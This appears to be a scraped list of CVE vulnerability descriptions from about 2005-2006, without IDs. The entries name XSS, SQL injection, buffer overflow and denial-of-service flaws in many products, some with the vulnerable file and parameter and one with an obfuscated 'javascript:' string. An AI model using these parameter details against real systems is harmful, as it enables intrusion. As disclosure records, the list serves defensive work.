Unspecified vulnerability in the Oracle Diagnostics module 2.2 and earlier allows remote attackers to access diagnostics tests via unknown attack vectors.
Multiple cross-site scripting (XSS) vulnerabilities in Woltlab Burning Board (wBB) allow remote attackers to inject arbitrary web script or HTML via (1) the username parameter to galerie_index.php and possibly (2) galerie_onfly.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information. The second vector might not be XSS.
Cross-site scripting (XSS) vulnerability in manage.asp in Addsoft StoreBot 2002 Standard allows remote attackers to inject arbitrary web script or HTML via the ShipMethod parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in MgrLogin.asp in Addsoft StoreBot 2005 Professional allows remote attackers to execute arbitrary SQL commands via the Pwd parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in fce.php in UKiBoard 3.0.1 allows remote attackers to inject arbitrary web script or HTML via a BBCode url tag when using the show_post function.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information, some of which reference a source URL that appears to be for an unrelated issue.
LetterMerger 1.2 stores user information in Access database files with insecure permissions, which allows local users to obtain sensitive information.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
agencyprofile.asp in Parodia 6.2 and earlier might allow remote attackers to obtain sensitive information by triggering an SQL error via an invalid AG_ID parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Cross-site scripting (XSS) vulnerability in agencyprofile.asp in Parodia 6.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the AG_ID parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
A vulnerability, which was classified as problematic, was found in Subscribe to Comments Plugin up to 2.0.7 on WordPress. This affects an unknown part of the file subscribe-to-comments.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 2.0.8 is able to address this issue. The identifier of the patch is 9683bdf462fcac2f32b33be98f0b96497fbd1bb6. It is recommended to upgrade the affected component. The identifier VDB-222321 was assigned to this vulnerability.
Stack-based buffer overflow in the NetBackup Catalog daemon (bpdbm) in Veritas NetBackup Enterprise Server 5.0 through 6.0 and DataCenter and BusinesServer 4.5FP and 4.5MP allows attackers to execute arbitrary code via unknown vectors.
Stack-based buffer overflow in the volume manager daemon (vmd) in Veritas NetBackup Enterprise Server 5.0 through 6.0 and DataCenter and BusinesServer 4.5FP and 4.5MP allows attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in the local weblog publisher in Nidelven IT Issue Dealer before 0.9.96 has unknown impact and attack vectors.
Cross-site scripting (XSS) vulnerability in PHPX 3.5.9 allows remote attackers to inject arbitrary web script or HTML via a javascript URI in a url XCode tag in a posted message.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in Brown Bear iCal 3.10 allows remote attackers to inject arbitrary web script or HTML via the Calendar Text field when a new event is added.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
** DISPUTED **
Cross-site scripting (XSS) vulnerability in Calcium 3.10.1 allows remote attackers to inject arbitrary web script or HTML via the EventText parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in register.php in DEV web management system 1.5 allows remote attackers to inject arbitrary web script or HTML via the "City/Region" field (mesto variable).  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in include/includes/user/login.php in ilchClan before 1.05g allows remote attackers to execute arbitrary SQL commands via the login_name parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in Calacode @Mail 4.3 allows remote attackers to inject arbitrary web script or HTML via a modified javascript: string in the SRC attribute of an IMG element in an e-mail message, as demonstrated by "java&amp;#09;script:."  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in Barracuda Directory 1.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors to the (1) Add URL and (2) Suggest Category module.  NOTE: the provenance of this information is unknown; portions of the details are obtained from third party information.
Unspecified vulnerability in ESS/ Network Controller and MicroServer Web Server in Xerox WorkCentre Pro and Xerox WorkCentre running software 13.027.24.015 and 14.027.24.015 allows remote attackers to "reduce effectiveness of security features" via unknown attack vectors.
Cross-site scripting vulnerability in ESS/ Network Controller and MicroServer Web Server in Xerox WorkCentre Pro and Xerox WorkCentre running software 13.027.24.015 and 14.027.24.015 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
Multiple unspecified vulnerabilities in ESS/ Network Controller and MicroServer Web Server in Xerox WorkCentre Pro and Xerox WorkCentre running software 13.027.24.015 and 14.027.24.015 allow remote attackers to bypass authentication or gain "unauthorized network access" via unknown attack vectors.
Off-by-one error in TIN 1.8.0 and earlier might allow attackers to execute arbitrary code via unknown vectors that trigger a buffer overflow.
Cross-site scripting (XSS) vulnerability in default.php in Clever Copy 3.0 allows remote attackers to inject arbitrary web script or HTML via the Subject field when sending private messages (privatemessages.php). NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
help.php in V-webmail 1.6.2 allows remote attackers to obtain the installation path via unspecified invalid parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
frameset.php in V-webmail 1.6.2 allows remote attackers to conduct phishing attacks by referencing arbitrary websites in the rframe parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in preferences.personal.php in V-webmail 1.6.2 allows remote attackers to inject arbitrary web script or HTML via the newid parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in calendar.php in MyBulletinBoard (MyBB) 1.0.4 allows remote attackers to inject arbitrary web script or HTML via a URL that is not sanitized before being returned as a link in "advanced details".  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in in.rexecd in Solaris 10 allows local users to gain privileges on Kerberos systems via unknown attack vectors.
CGIWrap before 3.10 allows remote attackers to obtain sensitive information via unknown attack vectors that cause errors in scripts that reveal system information.
nsHTMLContentSink.cpp in Mozilla Firefox and Thunderbird 1.x before 1.5 and 1.0.x before 1.0.8, Mozilla Suite before 1.7.13, and SeaMonkey before 1.0 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors involving a "particular sequence of HTML tags" that leads to memory corruption.
Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
Linux kernel before 2.6.15.5, when running on Intel processors, allows local users to cause a denial of service ("endless recursive fault") via unknown attack vectors related to a "bad elf entry address."
Unspecified vulnerability in index.php in imageVue 16.1 has unknown impact, probably a cross-site scripting (XSS) vulnerability involving the query string that is not quoted when inserted into style and body tags, as demonstrated using a bgcol parameter.
Unspecified vulnerabilities in Zen Cart before 1.2.7 allow remote attackers to cause unknown impact via unspecified vectors related to "other attempted exploits" other than SQL injection.
Zen Cart before 1.2.7 does not protect the admin/includes directory, which allows remote attackers to cause unknown impact via unspecified vectors, probably direct requests.
Multiple cross-site scripting (XSS) vulnerabilities in bbcodes system in e107 before 0.7.2 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
telnetd in Heimdal 0.6.x before 0.6.6 and 0.7.x before 0.7.2 allows remote unauthenticated attackers to cause a denial of service (server crash) via unknown vectors that trigger a null dereference.
Unspecified vulnerability in HP PSC 1210 All-in-One Drivers before 1.0.06 has unknown impact and attack vectors.
SQL injection vulnerability in index.php in PwsPHP 1.2.3 allows remote attackers to execute arbitrary SQL commands via the id parameter, possibly in message.php in the espace_membre module.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the (1) unix_mp and (2) unix_64 kernels in IBM AIX 5.3 VRMF 5.3.0.30 through 5.3.0.33 allows local users to cause a denial of service (system crash) via unknown vectors related to EMULATE_VMX.
Unspecified vulnerability in (1) query_store.php and (2) manage_proj_create.php in Mantis before 1.0.0 has unknown impact and attack vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  An original vendor bug report is referenced, but not accessible to the general public.
Cross-site scripting (XSS) vulnerability in config_defaults_inc.php in Mantis before 1.0 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  An original vendor bug report is referenced, but not accessible to the general public.
Powersave daemon before 0.10.15.2 allows local users to gain privileges (unauthorized access to an X session) via unspecified vectors. NOTE: the provenance of this information is unknown; portions of the details are obtained from third party information.
Cross-site scripting (XSS) vulnerability in add.php in Hinton Design phphd 1.0 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Multiple SQL injection vulnerabilities in Hinton Design phphd 1.0 allow remote attackers to execute arbitrary SQL commands via (1) the username parameter to check.php or (2) unknown attack vectors to scripts that display information from the database.
SQL injection vulnerability in Unknown Domain Shoutbox 2005.07.21 allows remote attackers to execute arbitrary SQL commands via unknown attack vectors.
Multiple cross-site scripting (XSS) vulnerabilities in Unknown Domain Shoutbox 2005.07.21 allow remote attackers to inject arbitrary web script or HTML, possibly via the (1) Handle or (2) Message fields.
Unspecified vulnerability in rshd in Heimdal 0.6.x before 0.6.6 and 0.7.x before 0.7.2, when storing forwarded credentials, allows attackers to overwrite arbitrary files and change file ownership via unknown vectors.
Multiple integer overflows in (1) the new_demux_packet function in demuxer.h and (2) the demux_asf_read_packet function in demux_asf.c in MPlayer 1.0pre7try2 and earlier allow remote attackers to execute arbitrary code via an ASF file with a large packet length value. NOTE: the provenance of this information is unknown; portions of the details are obtained from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in phpstatus 1.0 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors in the administrative interface.
Multiple SQL injection vulnerabilities in phpstatus 1.0, when gpc_magic_quotes is disabled, allow remote attackers to execute arbitrary SQL commands and bypass authentication via (1) the username parameter in check.php and (2) unknown attack vectors in the administrative interface.
Cross-site scripting (XSS) vulnerability in user_class.php in Papoo 2.1.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the username field during the registration of a new account.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
sys_mbind in mempolicy.c in Linux kernel 2.6.16 and earlier does not sanity check the maxnod variable before making certain computations for the get_nodes function, which has unknown impact and attack vectors.
The Linux Kernel before 2.6.15.5 allows local users to cause a denial of service (NFS client panic) via unknown attack vectors related to the use of O_DIRECT (direct I/O).
SQL injection vulnerability in the Data Pump Metadata API in Oracle Database 10g and possibly earlier might allow remote attackers to execute arbitrary SQL commands via unknown vectors.  NOTE: due to the lack of relevant details from the Oracle advisory, a separate CVE is being created since it cannot be conclusively proven that this issue has been addressed by Oracle.  It is possible that this is the same issue as Oracle Vuln# DB06 from the January 2006 CPU, in which case this would be subsumed by CVE-2006-0259 or, if it is DB05, subsumed by CVE-2006-0260.
SQL injection vulnerability in the SYS.DBMS_METADATA_UTIL package in Oracle Database 10g, and possibly earlier versions, might allow remote attackers to execute arbitrary SQL commands via unknown vectors. NOTE: due to the lack of relevant details from the Oracle advisory, a separate CVE is being created since it cannot be conclusively proven that this issue has been addressed by Oracle.  It is possible that this is the same issue as Oracle Vuln# DB05 from the January 2006 CPU, in which case this would be subsumed by CVE-2006-0260.  However, there are some inconsistencies that make this unclear, and there is also a possibility that this is related to DB06, which is subsumed by CVE-2006-0259.
SQL injection vulnerability in the Oracle Text component of Oracle Database 10g, and possibly earlier versions, might allow remote attackers to execute arbitrary SQL commands via unknown vectors. NOTE: due to the lack of relevant details from the Oracle advisory, a separate CVE is being created since it cannot be conclusively proven that this issue has been addressed by Oracle.  It is possible that this is the same issue as Oracle Vuln# DB15 from the January 2006 CPU, in which case this would be subsumed by CVE-2006-0260.
Cerulean Trillian 3.1.0.120 allows remote attackers to cause a denial of service (client crash) via an AIM message containing the Mac encoded Rich Text Format (RTF) escape sequences (1) \'d1, (2) \'d2, (3) \'d3, (4) \'d4, and (5) \'d5.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in Tachyon Vanilla Guestbook 1.0 beta allow remote attackers to inject arbitrary web script or HTML via unknown vectors related to "posting new messages."
Multiple cross-site scripting (XSS) vulnerabilities in Community Server allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors.  NOTE: this candidate does not contain any actionable or distinguishing information.  Perhaps it should not be included in CVE.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in the Authentication Servlet in Symantec Sygate Management Server (SMS) version 4.1 build 1417 and earlier allows remote attackers to execute arbitrary SQL commands and bypass authentication via unknown attack vectors related to a URL.
SQL injection vulnerability index.php in Dragoran Portal module 1.3 for Invision Power Board (IPB) allows remote attackers to execute arbitrary SQL commands via the site parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the kernel processing in Solaris 10 64 bit platform, when running in 64-bit mode, allows local users to cause a denial of service (system panic) via unknown attack vectors.
Multiple cross-site scripting (XSS) vulnerabilities in Easy CMS allow remote attackers to inject arbitrary web script or HTML via (1) unknown attack vectors in the administrative interface and (2) input fields of the contact form.
Cross-site scripting (XSS) vulnerability in rlink.php in Rlink 1.0.0 module for phpBB allows remote attackers to inject arbitrary web script or HTML via the url parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in PHP GEN before 1.4 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
Multiple SQL injection vulnerabilities in PHP GEN before 1.4 allow remote attackers to inject arbitrary SQL commands via unknown attack vectors.
The strnlen_user function in Linux kernel before 2.6.16 on IBM S/390 can return an incorrect value, which allows local users to cause a denial of service via unknown vectors.
Unspecified vulnerability in WeBWorK 2.1.3 and 2.2-pre1 allows remote privileged attackers to execute arbitrary commands as the web server via unknown attack vectors.
Unspecified vulnerability in HP HP-UX B.11.00, B.11.04, and B.11.11 allows local users to gain privileges via unknown attack vectors.
Unspecified vulnerability in BEA WebLogic Server and WebLogic Express 8.1 SP5 allows untrusted applications to obtain the server's SSL identity via unknown attack vectors.
BEA WebLogic Portal 8.1 through SP4 allows remote attackers to obtain the source for a deployment descriptor file via unknown vectors.
Multiple unspecified vulnerabilities in BEA WebLogic Server and WebLogic Express 8.1 through SP4, 7.0 through SP6, and 6.1 through SP7 allow remote attackers to access MBean attributes or cause an unspecified denial of service via unknown attack vectors.
BEA WebLogic Server and WebLogic Express 8.1 through SP4 and 7.0 through SP6 does not properly handle when servlets use relative forwarding, which allows remote attackers to cause a denial of service (slowdown) via unknown attack vectors that cause "looping stack overflow errors."
CoreTypes in Apple Mac OS X 10.4 up to 10.4.5 allows remote attackers to bypass the same-origin policy and execute Javascript in other domains via unknown vectors involving "crafted archives."
Cross-site scripting (XSS) vulnerability in register.aspx in Douran FollowWeb allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
TippingPoint Intrusion Prevention System (IPS) TOS before 2.1.4.6324, and TOS 2.2.x before 2.2.1.6506, allow remote attackers to cause a denial of service (CPU consumption) via an unknown vector, probably involving an HTTP request with a negative number in the Content-Length header.
Unspecified "critical denial-of-service vulnerability" in MyDNS before 1.1.0 has unknown impact and attack vectors.
Format string vulnerability in the write_logfile function in ELOG before 2.6.1 allows remote attackers to cause a denial of service (server crash) via unknown attack vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Port Discovery Standard and Advanced features in Hitachi JP1/NetInsight II allows attackers to stop the Port Discovery service via unknown vectors involving "invalid format data".
Kerio WinRoute Firewall before 6.1.4 Patch 2 allows attackers to cause a denial of service (CPU consumption and hang) via unknown vectors involving "browsing the web".
Cross-site scripting (XSS) vulnerability in Gallery before 1.5.2 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors, possibly involving the user name (fullname).
SQL injection vulnerability in HITSENSER Data Mart Server BS, BS-S, BS-M, BS-L, and EX allows remote attackers to execute arbitrary SQL commands via unknown attack vectors.
Cross-site scripting (XSS) vulnerability in rkrt_stats.php in RedKernel Referrer Tracker 1.1.0-3 allows remote attackers to inject arbitrary web script or HTML via a query string value as a GET, which is stored in the $QUERY_STRING variable.  NOTE: the provenance of this information is unknown; portions of the details are obtained from third party information.
Multiple unspecified vulnerabilities in the (1) publishing component, (2) Contact Component, (3) TinyMCE Compressor, and (4) other components in Joomla! 1.0.5 and earlier have unknown impact and attack vectors.
The XML parser in Mozilla Firefox before 1.5.0.1 and SeaMonkey before 1.0 allows remote attackers to cause a denial of service (crash) and possibly read sensitive data via unknown attack vectors that trigger an out-of-bounds read.
The Javascript interpreter (jsinterp.c) in Mozilla and Firefox before 1.5.1 does not properly dereference objects, which allows remote attackers to cause a denial of service (crash) or execute arbitrary code via unknown attack vectors related to garbage collection.
Cross-site scripting (XSS) vulnerability in SMBCMS 2.1 allows remote attackers to inject arbitrary web script or HTML via the text parameter, which is used by the "Search Site" field.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in GTP iCommerce allows remote attackers to inject arbitrary web script or HTML via the (1) cat and (2) subcat parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in lpsched in Sun Solaris 8, 9, and 10 allow local users to delete arbitrary files or disable the LP print service via unknown attack vectors.
Multiple cross-site scripting (XSS) vulnerabilities in DCP-Portal 5.3 through 6.1.1 allow remote attackers to inject arbitrary web script or HTML via (1) the day parameter in calendar.php and (2) the input form in search.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  It is possible that this issue is resultant from an SQL injection problem in CVE-2005-4227.3 and CVE-2005-4227.13.
Multiple SQL injection vulnerabilities in Wordcircle 2.17 allow remote attackers to (1) execute arbitrary SQL commands and bypass authentication via the password field in the login action to index.php (involving v_login.php and s_user.php) and (2) have other unknown impact via certain other fields in unspecified scripts.
Format string vulnerability in /bin/ftp in UNICOS 9.0.2.2 allows local users to have an unknown impact via format string specifiers in the quote command.  NOTE: because the program is not setuid and not normally called from remote programs, there may not be a typical attack vector for the issue that crosses privilege boundaries. Therefore this may not be a vulnerability.
Unspecified vulnerability in uucp in Sun Solaris 8 and 9 has unknown impact and attack vectors.  NOTE: due to the vagueness of the vendor advisory, it is not clear whether this is related to CVE-2004-0780.
SQL injection vulnerability in escribir.php in Foro Domus 2.10 allows remote attackers to execute arbitrary SQL commands via the email parameter.  NOTE: the provenance of this information is unknown, although it may be based on post-disclosure analysis of CVE-2006-0110; the details are obtained solely from third party information.
Cross-site scripting (XSS) in search_result.php in phpChamber 1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the needle parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in andromeda.php in Andromeda 1.9.3.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the s parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Buffer overflow in the IMAP service of Rockliffe MailSite before 6.1.22.1 allows remote attackers to have an unknown impact via unknown attack vectors.
Unspecified vulnerability in appserv/main.php in AppServ 2.4.5 allows remote attackers to include arbitrary files via the appserv_root parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  There is not enough detail from these third party sources to know whether this is directory traversal, remote file include, or another issue.
Multiple memory leaks in IBM Lotus Notes and Domino Server before 6.5.5 allow attackers to cause a denial of service (memory consumption and crash) via unknown vectors related to (1) unspecified vectors during the SSL handshake (SPR# MKIN67MQVW), (2) the stash file during the SSL handshake (SPR# MKIN693QUT), and possibly other vectors. NOTE: due to insufficient information in the original vendor advisory, it is not clear whether there is an attacker role in other memory leaks that are specified in the advisory.
Multiple unspecified vulnerabilities in IBM Lotus Notes and Domino Server before 6.5.5 have unknown impact and attack vectors, due to "potential security issues" as identified by SPR numbers (1) GPKS6C9J67 in Agents, (2) JGAN6B6TZ3 and (3) KSPR699NBP in the Router, (4) GPKS5YQGPT in Security, or (5) HSAO6BNL6Y in the Web Server. NOTE: vector 3 is related to an issue in NROUTER in IBM Lotus Notes and Domino Server before 6.5.4 FP1, 6.5.5, and 7.0, which allows remote attackers to cause a denial of service (CPU consumption) via a crafted vCal meeting request sent via SMTP (aka SPR# KSPR699NBP).
SQL injection vulnerability in mcl_login.asp in Timecan CMS allows remote attackers to execute arbitrary SQL commands via the email parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  Due to the unavailability of the original source, it cannot be determined if this is the same issue as identified by CVE-2006-0107.
SQL injection vulnerability in Timecan CMS allows remote attackers to execute arbitrary SQL commands via the viewID parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  Due to the unavailability of the original source, it cannot be determined if this is the same issue as identified by CVE-2006-0108.
wan/sdla.c in Linux kernel 2.6.x before 2.6.11 and 2.4.x before 2.4.29 does not require the CAP_SYS_RAWIO privilege for an SDLA firmware upgrade, with unknown impact and local attack vectors.  NOTE: further investigation suggests that this issue requires root privileges to exploit, since it is protected by CAP_NET_ADMIN; thus it might not be a vulnerability, although capabilities provide finer distinctions between privilege levels.
PHP remote file include vulnerability in forum.php in oaBoard 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the inc_stat parameter, a different vulnerability than CVE-2006-0076. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in DiscusWare Discus Freeware 3.10.5 and Professional 3.10.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in a URL, which is not properly sanitized from the resulting error message.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to bypass the Kill bit settings for dangerous ActiveX controls via unknown vectors involving crafted HTML, which can expose the browser to attacks that would otherwise be prevented by the Kill bit setting. NOTE: CERT/CC claims that MS05-054 fixes this issue, but it is not described in MS05-054.
Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers to cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
GNOME Evolution 2.4.2.1 and earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a text e-mail with a large number of URLs, possibly due to unknown problems in gtkhtml.
Unspecified vulnerability in the RDS.Dataspace ActiveX control, which is contained in ActiveX Data Objects (ADO) and distributed in Microsoft Data Access Components (MDAC) 2.7 and 2.8, allows remote attackers to execute arbitrary code via unknown attack vectors.
Unspecified vulnerability on certain Sun StorEdge 6130 (SE6130) Controller Arrays allows remote attackers to delete data via unknown vectors.
Unspecified vulnerability in the Oracle OLAP component in Oracle Database Server 10.1.0.4 (10g) allows remote authenticated attackers to affect availability via unknown vectors, aka DB02.
Unspecified vulnerability in Spey 0.3.3 has unknown impact and attack vectors related to "A number of security holes which could lead to compromise," a different issue than CVE-2005-4846.
VirtueMart before 1.0.1 does not properly handle errors when a user is forbidden to read a requested page, which has unknown impact and remote attack vectors.
Buffer overflow in the HP HTTP Server 5.0 through 5.95 of the HP Web-enabled Management Software allows remote attackers to execute arbitrary code via unknown vectors.
Cross-site scripting (XSS) vulnerability in Lotus Domino versions before 6.5.4 fix pack 1 (FP1) and versions before 7.0 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Multiple SQL injection vulnerabilities in Copernicus Europa allow remote attackers to execute arbitrary SQL commands via unknown vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Format string vulnerability in ui.c in Textbased MSN Client (TMSNC) before 0.2.5 allows attackers to cause a denial of service and possibly execute arbitrary code via unknown attack vectors that cause format strings to be injected into the wprintw function.
Buffer overflow in reset_vars in config/tc-crx.c in the GNU as (gas) assembler in Free Software Foundation GNU Binutils before 20050714 allows user-assisted attackers to have an unknown impact via a crafted .s file.
Multiple unspecified vulnerabilities in Sun Java System Web Proxy Server 3.6 SP7 and earlier allow remote attackers to cause a denial of service (unresponsive service) via unknown vectors.
Unspecified vulnerability in Sun Java System Application Server 7 Standard and Platform Edition 6 and earlier, and 2004Q2 Standard and Platform Edition Update 2 and earlier, allows remote attackers to obtain the source code for Java Server pages (JSP) via unknown vectors.
Unspecified vulnerability in Sun Java System Application Server Platform Edition and Enterprise Edition 8.1 2005 Q1, and Platform Edition UR1, allows remote attackers to read .jar files via unknown vectors related to deployed web applications.
Unspecified vulnerability in the XView library (libxview.so) in Solaris 2.5 to 10 allows local users to corrupt files via unknown vectors related to the handling of the clipboard selection while an XView application exits.
Unspecified vulnerability in the multi-language environment library (libmle) in Solaris 7 and 8, as shipped with the Japanese locale, allows local users to gain privileges via unknown attack vectors.
SQL injection vulnerability in index.php in Appalachian State University phpWebSite 0.10.1 and earlier allows remote attackers to execute arbitrary SQL commands via the module parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in an unspecified Accelerated Enterprise Solutions product, possibly Accelerated E Solutions, allows remote attackers to execute arbitrary SQL commands via the password parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in addrbook.php in Belchior Foundry vCard PRO 3.1 allows remote attackers to execute arbitrary SQL commands via the addr_id parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Administration server in BEA WebLogic Server and WebLogic Express 8.1 SP3 and earlier allows remote authenticated Admin users to read arbitrary files via unknown attack vectors related to an "internal servlet" accessed through HTTP.
BEA WebLogic Server and WebLogic Express 8.1 SP3 and earlier allow remote attackers to obtain sensitive information (intranet IP addresses) via unknown attack vectors involving "network address translation."
Multiple cross-site scripting (XSS) vulnerabilities in BEA WebLogic Server and WebLogic Express 9.0, 8.1 SP4 and earlier, 7.0 SP6 and earlier, and 6.1 SP7 and earlier allow remote attackers to inject arbitrary web script or HTML and gain administrative privileges via unknown attack vectors.
BEA WebLogic Server and WebLogic Express 8.1 SP4 and earlier, 7.0 SP5 and earlier, and 6.1 SP7 and earlier allow remote attackers to cause a denial of service (server thread hang) via unknown attack vectors.
Cross-site scripting (XSS) vulnerability in WebHost Automation Ltd Helm before 3.2.6 allows remote attackers to inject arbitrary web script or HTML via unknown vectors involving the default page.
Multiple buffer overflows in FreeRADIUS 1.0.3 and 1.0.4 allow remote attackers to cause denial of service (crash) via (1) the rlm_sqlcounter module or (2) unknown vectors "while expanding %t".
SQL injection vulnerability in the rlm_sqlcounter module in FreeRADIUS 1.0.3 and 1.0.4 allows remote attackers to execute arbitrary SQL commands via unknown attack vectors.
Unspecified vulnerability in Echelog 0.6.2 allows attackers to "exploit function stacks on some architectures," with unknown impact and attack vectors.
Unspecified vulnerability in PEAR Text_Password 1.0 has unknown impact and attack vectors, related to "problematic seeding" of the random number generator, possibly predictable seeds.
Format string vulnerability in the vmps_log function in OpenVMPS (VLAN Management Policy Server) 1.3 allows remote attackers to execute arbitrary code via unknown vectors.
SQL injection vulnerability in Neocrome Land Down Under (LDU) 801 allows remote attackers to execute arbitrary SQL commands via an HTTP Referer header.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in PHP GEN before 1.3 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
Unspecified vulnerability in the "privilege management" feature of Sun Solaris 10 allows local users to cause a denial of service (panic) via unknown vectors that trigger a null dereference in the secpolicy_fs_common function.
SQL injection vulnerability in the favorites module in index.php in IPBProArcade 2.5.2 allows remote attackers to inject arbitrary SQL commands via the gameid parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information. In addition, the demonstration code as used by third parties suggests that this might be a different type of vulnerability related to shell metacharacters.  Finally, this could be a rediscovery of CVE-2004-1430.
Unspecified vulnerability in Process File System (procfs) in Sun Solaris 10 allows local users to obtain sensitive information such as process working directories via unknown attack vectors, possibly pwdx.
Unspecified vulnerability in the www_add method in Asset.pm in Plain Black WebGUI 6.3.0 and other versions before 6.7.6 allows attackers to execute arbitrary code via unknown attack vectors.
Unspecified vulnerability in mroovca stats (mroovcastats) before 0.4.5b has unknown attack vectors and impact, related to cookies.
Cross-site scripting (XSS) vulnerability in error.asp in AudienceView allows remote attackers to inject arbitrary web script or HTML via the TSerrorMessage parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Apple Safari 2.0.2 (aka 416.12) allows remote attackers to spoof the URL in the status bar via the title in an image in a link to a trusted site within a form to the malicious site.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in PHlyMail before 3.3 Beta1 allows remote attackers to inject arbitrary Javascript via unknown attack vectors.
Cross-site scripting (XSS) vulnerability in OcoMon 1.20, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
Multiple SQL injection vulnerabilities in OcoMon 1.20, and possibly earlier versions, allow remote attackers to execute arbitrary SQL commands via unknown attack vectors in an unspecified input form, a different vulnerability than CVE-2005-4664.
Multiple cross-site scripting (XSS) vulnerabilities in ASP-Programmers.com ASPKnowledgebase allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors in the administrative interface.
Ocean12 Calendar Manager Pro 1.01 allows remote attackers to bypass authentication and obtain sensitive information via a direct request to /admin/view.asp.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in Oracle for OpenView (OfO) 8.1.7, 9.1.01, and 9.2, and OfO for Linux, allow remote attackers to have an unknown impact via unknown attack vectors.  NOTE: because of the lack of details in the vendor advisory, it is unclear which set of existing CVEs this advisory might refer to.
SQL injection vulnerability in PHlyMail 3.02.01 allows remote attackers to execute arbitrary SQL commands via unknown attack vectors.
